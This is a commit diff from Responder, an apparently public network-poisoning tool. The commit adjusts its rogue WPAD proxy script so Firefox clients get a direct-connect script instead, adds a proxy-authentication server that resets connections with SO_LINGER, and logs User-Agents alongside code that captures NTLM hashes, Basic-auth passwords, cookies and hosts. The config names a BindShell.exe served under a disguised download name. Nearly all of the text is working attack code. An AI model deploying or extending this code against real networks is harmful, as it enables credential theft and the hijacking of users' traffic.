Firefox blacklisted on WPAD since it doesn't honors fail-over proxies. Added SO_LINGER to send RST when close() is called.

2025-07-30 11:38:55 -07:00 · 2016-09-11 13:07:44 -03:00 · 2016-09-11 13:07:44 -03:00 · 29ad8a0816
commit 29ad8a0816
parent 23151fee42
5 changed files with 56 additions and 14 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -46,7 +46,7 @@ DontRespondTo =

 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP

 ; If set to On, we will stop answering further requests from a host
 ; if a hash hash been previously captured for this host.
@ -79,7 +79,7 @@ ExeFilename = files/BindShell.exe
 ExeDownloadName = ProxyClient.exe

 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}

 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.
--- a/Responder.py
+++ b/Responder.py
@ -20,7 +20,7 @@ import ssl
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()

 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
@ -77,6 +77,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 				pass
 		TCPServer.server_bind(self)

+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+	def server_bind(self):
+		if OsInterfaceIsSupported():
+			try:
+				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+			except:
+				pass
+                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		TCPServer.server_bind(self)
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@ -113,6 +123,7 @@ ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+ThreadingTCPServerAuth.allow_reuse_address = 1

 def serve_thread_udp_broadcast(host, port, handler):
 	try:
@ -160,6 +171,17 @@ def serve_thread_tcp(host, port, handler):
 	except:
 		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."

+def serve_thread_tcp_auth(host, port, handler):
+	try:
+		if OsInterfaceIsSupported():
+			server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
+			server.serve_forever()
+		else:
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+	except:
+		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+
 def serve_thread_SSL(host, port, handler):
 	try:

@ -207,7 +229,7 @@ def main():

 		if settings.Config.ProxyAuth_On_Off:
 		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,)))
+		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))

 		if settings.Config.SMB_On_Off:
 			if settings.Config.LM_On_Off:
--- a/packets.py
+++ b/packets.py
@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet):
    ])


+
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@ -14,9 +14,9 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
 from SocketServer import BaseRequestHandler, StreamRequestHandler
 from base64 import b64decode
-import struct
 from utils import *

 from packets import NTLM_Challenge
@ -103,9 +103,26 @@ def GrabReferer(data, host):
 		return Referer
 	return False

+def SpotFirefox(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+        print text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2))
+	if UserAgent:
+                IsFirefox = re.search('Firefox', UserAgent[0])
+                if IsFirefox:
+                        print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
+                        print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
+                        return True
+                else:
+	               return False
+
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
+		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
+		Buffer.calculate()
+		return str(Buffer)
+
+	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@ -19,6 +19,10 @@ from HTTP import ParseHTTPHash
 from packets import *
 from utils import *

+def GrabUserAgent(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+        print text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2))
+
 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)

@ -59,13 +63,15 @@ def PacketSequence(data, client):
 		if Packet_NTLM == "\x03":
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
+                        GrabUserAgent(data)
                        GrabCookie(data)
                        GrabHost(data)
-   	                return False
+   	                return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
 		else:
               		return False

 	elif Basic_Auth:
+                GrabUserAgent(data)
                GrabCookie(data)
                GrabHost(data)
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@ -91,11 +97,6 @@ def PacketSequence(data, client):

 class Proxy_Auth(SocketServer.BaseRequestHandler):

-    def server_bind(self):
-       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
-       self.socket.bind(self.server_address)
-       self.socket.setblocking(0)
-       self.socket.setdefaulttimeout(1)

    def handle(self):
 		try:
@ -106,3 +107,4 @@ class Proxy_Auth(SocketServer.BaseRequestHandler):
 		except:
                   	pass

+